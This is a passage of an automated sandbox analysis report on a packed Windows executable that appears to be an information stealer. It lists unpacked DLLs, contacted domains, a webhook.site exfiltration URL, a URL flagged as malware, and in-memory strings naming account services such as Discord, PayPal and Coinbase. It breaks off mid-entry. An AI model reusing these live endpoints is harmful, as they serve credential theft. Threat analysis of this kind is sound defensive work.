C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-sysinfo-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-timezone-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-core-util-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-conio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-convert-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-environment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-filesystem-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-locale-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-math-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-process-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-runtime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-stdio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-time-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\api-ms-win-crt-utility-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\libffi-7.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\libssl-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\python310.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\ucrtbase.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI52202\unicodedata.pyd	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
geolocation-db.com	1%	Virustotal		Browse
webhook.site	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://crl.dhimyotis.com/certignarootca.crl0	0%	URL Reputation	safe
http://crl.dhimyotis.com/certignarootca.crl0	0%	URL Reputation	safe
http://crl.dhimyotis.com/certignarootca.crl	0%	URL Reputation	safe
https://wwww.certigna.fr/autorites/0m	0%	URL Reputation	safe
https://wwww.certigna.fr/autorites/	0%	URL Reputation	safe
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	0%	URL Reputation	safe
http://crl.securetrust.com/STCA.crl	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
http://www.accv.es00	0%	URL Reputation	safe
http://schemas.mi	0%	URL Reputation	safe
https://discord.com)z	0%	Avira URL Cloud	safe
http://crl.securetrust.com/SGCA.crl	0%	URL Reputation	safe
https://tiktok.com)	0%	Avira URL Cloud	safe
http://blog.cryptographyusering.com/2012/05/how-to-choose-authenticated-encryption.html	0%	URL Reputation	safe
https://coinbase.com)	0%	Avira URL Cloud	safe
https://ebay.com)z$	0%	Avira URL Cloud	safe
https://discord.com)	0%	Avira URL Cloud	safe
http://crl.securetrust.com/STCA.crl0	0%	URL Reputation	safe
https://paypal.com)	0%	Avira URL Cloud	safe
https://webhook.site/6ef9c344-b801-4707-b071-bfe96f5a7949	0%	Avira URL Cloud	safe
https://xbox.com)	0%	Avira URL Cloud	safe
https://riotgames.com)	0%	Avira URL Cloud	safe
https://disney.com)z$	0%	Avira URL Cloud	safe
https://youtube.com)	0%	Avira URL Cloud	safe
https://twitch.com)z	0%	Avira URL Cloud	safe
https://amazon.com)	0%	Avira URL Cloud	safe
https://gmail.com)z	0%	Avira URL Cloud	safe
https://uber.com)z	0%	Avira URL Cloud	safe
https://paypal.com)z	0%	Avira URL Cloud	safe
https://coinbase.com)z	0%	Avira URL Cloud	safe
https://crunchyroll.com)	0%	Avira URL Cloud	safe
https://ebay.com)	0%	Avira URL Cloud	safe
https://roblox.com)z	0%	Avira URL Cloud	safe
http://crl.dhimyotis.com/certignarootca.crlY	0%	Avira URL Cloud	safe
https://superfurrycdn.nl/copy/	100%	Avira URL Cloud	malware
https://geolocation-db.com/jsonp/z	0%	Avira URL Cloud	safe
https://playstation.com)	0%	Avira URL Cloud	safe
https://sellix.io)	0%	Avira URL Cloud	safe
https://twitter.com)z	0%	Avira URL Cloud	safe
https://hbo.com)z	0%	Avira URL Cloud	safe
https://geolocation-db.com/jsonp/102.129.143.44	0%	Avira URL Cloud	safe
https://binance.com)z	0%	Avira URL Cloud	safe
https://disney.com)	0%	Avira URL Cloud	safe
https://tiktok.com)z	0%	Avira URL Cloud	safe
https://origin.com)z	0%	Avira URL Cloud	safe
https://telegram.com)z	0%	Avira URL Cloud	safe
https://pornhub.com)z	0%	Avira URL Cloud	safe
https://riotgames.com)z	0%	Avira URL Cloud	safe
https://playstation.com)z	0%	Avira URL Cloud	safe
https://wwww.certigna.fr/autorites/u	0%	Avira URL Cloud	safe
https://twitch.com)	0%	Avira URL Cloud	safe
https://steam.com)z	0%	Avira URL Cloud	safe
https://mahler:8092/site-updates.py	0%	Avira URL Cloud	safe
http://.../back.jpeg	0%	Avira URL Cloud	safe
https://webhook.site/6ef9c344-b801-4707-b071-bfe96f5a7949Fc	0%	Avira URL Cloud	safe
http://crl.xrampsecurity.com/XGCA.crl2y	0%	Avira URL Cloud	safe
http://crl.securetrust.com/STCA.crlB	0%	Avira URL Cloud	safe
https://yahoo.com)	0%	Avira URL Cloud	safe
https://netflix.com)	0%	Avira URL Cloud	safe
https://gmail.com)	0%	Avira URL Cloud	safe
https://hotmail.com)	0%	Avira URL Cloud	safe
https://origin.com)	0%	Avira URL Cloud	safe
https://roblox.com)	0%	Avira URL Cloud	safe
https://outlook.com)	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api4.ipify.org	64.185.227.155	true	false		high
geolocation-db.com	159.89.102.253	true	false	1%, Virustotal, Browse	unknown
api.gofile.io	51.38.43.18	true	false		high
webhook.site	46.4.105.116	true	false	0%, Virustotal, Browse	unknown
api.ipify.org	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://webhook.site/6ef9c344-b801-4707-b071-bfe96f5a7949	false	Avira URL Cloud: safe	unknown
https://geolocation-db.com/jsonp/102.129.143.44	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://repository.swisssign.com/A	4Vp6Xc8SFr.exe, 00000001.00000003.268784547.0000017ACA06D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cloud.google.com/appuser/docs/standard/runtimes	4Vp6Xc8SFr.exe, 00000001.00000002.322585761.0000017AC9CF0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.dhimyotis.com/certignarootca.crl0	4Vp6Xc8SFr.exe, 00000001.00000003.314533021.0000017AC9B88000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.312257969.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310364004.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://coinbase.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://discord.com)z	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://tiktok.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://ebay.com)z$	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://discord.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://python.org/dev/peps/pep-0263/	4Vp6Xc8SFr.exe, 00000001.00000002.334748634.00007FFCFE052000.00000002.00000001.01000000.00000005.sdmp	false		high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	4Vp6Xc8SFr.exe, 00000001.00000003.262114374.0000017AC75F8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262463075.0000017AC75F8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.263171502.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.309839320.0000017AC974D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.261960028.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262892596.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262892596.0000017AC75F3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262114374.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262304215.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310867870.0000017AC9774000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.311013401.0000017AC75BB000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262463075.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317030830.0000017AC75E4000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.318212716.0000017AC75EF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262304215.0000017AC75F8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.320473673.0000017AC75F0000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.263171502.0000017AC75F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc2388#section-4.4	4Vp6Xc8SFr.exe, 00000001.00000003.315732154.0000017AC9B8B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.314533021.0000017AC9B88000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.312257969.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310364004.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316051174.0000017AC9B8D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316951723.0000017AC9B8F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://paypal.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://disney.com)z$	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://riotgames.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://xbox.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://youtube.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://twitch.com)z	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://cdn.discordapp.com/attachments/963114349877162004/992593184251183195/7c8f476123d28d103efe381	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc3610	4Vp6Xc8SFr.exe, 00000001.00000003.315732154.0000017AC9B8B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.314533021.0000017AC9B88000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313746956.0000017AC9F82000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.312257969.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310364004.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9F94000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310101800.0000017AC9F7B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.315855580.0000017AC9B95000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316400323.0000017AC9FA9000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9F7F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9F70000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.dhimyotis.com/certignarootca.crlY	4Vp6Xc8SFr.exe, 00000001.00000003.276315620.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.275933215.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.dhimyotis.com/certignarootca.crl	4Vp6Xc8SFr.exe, 00000001.00000003.268784547.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269101774.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.268784547.0000017ACA0F1000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276315620.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269509616.0000017ACA0F3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269509616.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.268919432.0000017ACA0F1000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276376619.0000017ACA0D0000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.275933215.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269752029.0000017ACA0DA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://curl.haxx.se/rfc/cookie_spec.html	4Vp6Xc8SFr.exe, 00000001.00000002.324535554.0000017AC9DF0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.accv.es	4Vp6Xc8SFr.exe, 00000001.00000003.270118444.0000017ACA03D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276157529.0000017ACA0EC000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.275933215.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://superfurrycdn.nl/copy/	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	4Vp6Xc8SFr.exe, 00000001.00000003.263171502.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.261960028.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262892596.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262114374.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262304215.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262463075.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.320632899.0000017AC8F6C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://httpbin.org/get	4Vp6Xc8SFr.exe, 00000001.00000002.320880496.0000017AC93C0000.00000004.00001000.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317461335.0000017AC9EFC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://amazon.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://crunchyroll.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://gmail.com)z	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://httpbin.org/	4Vp6Xc8SFr.exe, 00000001.00000003.311013401.0000017AC75BB000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317030830.0000017AC75E4000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.324813601.0000017AC9EFF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317461335.0000017AC9EFC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://paypal.com)z	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://uber.com)z	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://coinbase.com)z	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://wwww.certigna.fr/autorites/0m	4Vp6Xc8SFr.exe, 00000001.00000003.314533021.0000017AC9B88000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.312257969.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310364004.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.268784547.0000017ACA0F1000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276315620.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269509616.0000017ACA0F3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.268919432.0000017ACA0F1000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276376619.0000017ACA0D0000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.275933215.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	4Vp6Xc8SFr.exe, 00000001.00000003.262114374.0000017AC75F8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262463075.0000017AC75F8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.263171502.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.309839320.0000017AC974D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.261960028.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262892596.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262892596.0000017AC75F3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262114374.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262304215.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310867870.0000017AC9774000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.311013401.0000017AC75BB000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262463075.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317030830.0000017AC75E4000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.318212716.0000017AC75EF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262304215.0000017AC75F8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.320473673.0000017AC75F0000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.263171502.0000017AC75F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://geolocation-db.com/jsonp/z	4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ebay.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://httpbin.org/	4Vp6Xc8SFr.exe, 00000001.00000003.311013401.0000017AC75BB000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317030830.0000017AC75E4000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.324813601.0000017AC9EFF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317461335.0000017AC9EFC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wwww.certigna.fr/autorites/	4Vp6Xc8SFr.exe, 00000001.00000003.268784547.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269101774.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276315620.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269509616.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276376619.0000017ACA0D0000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269945464.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.275933215.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.270071852.0000017ACA0D5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://roblox.com)z	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	4Vp6Xc8SFr.exe, 00000001.00000003.264819253.0000017AC97E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://hbo.com)z	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://binance.com)z	4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://playstation.com)	4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	4Vp6Xc8SFr.exe, 00000001.00000003.315732154.0000017AC9BC8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.322134173.0000017AC9BCE000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310364004.0000017AC9BC8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316092686.0000017AC9BCD000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.312257969.0000017AC9BC8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.311130928.0000017AC9BC8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308418666.0000017AC9BC8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	4Vp6Xc8SFr.exe, 00000001.00000003.262114374.0000017AC75F8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262463075.0000017AC75F8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.263171502.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.309839320.0000017AC974D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.261960028.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262892596.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262892596.0000017AC75F3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.262114374.0000017AC7625000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 